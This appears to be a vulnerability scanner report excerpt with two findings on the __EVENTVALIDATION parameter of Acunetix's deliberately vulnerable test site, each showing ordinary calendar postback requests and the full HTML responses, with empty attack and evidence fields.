URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1125 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,125 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8223&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgCAsqKrX9oIZGRkHkUGKrk8wqHb9vsdIoL9dJRYWl8%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLlmJytAQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8YJghtPk09xfmmUuYKhg%2BPeiHNuw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:09:14 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgCAsqKrX9oIZGRkHkUGKrk8wqHb9vsdIoL9dJRYWl8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLlmJytAQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8YJghtPk09xfmmUuYKhg+PeiHNuw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:White" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1169 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,169 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8343&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgCARIT3vdoIZGRkNFwJI0cS6lqxUi1ozTCZMUG6VoI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLLx5LdBALHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA%2ByaX16u3O%2BUC7XoFICcZVZTsJFp
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:52:35 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgCARIT3vdoIZGRkNFwJI0cS6lqxUi1ozTCZMUG6VoI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLLx5LdBALHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA+yaX16u3O+UC7XoFICcZVZTsJFp" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:White" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
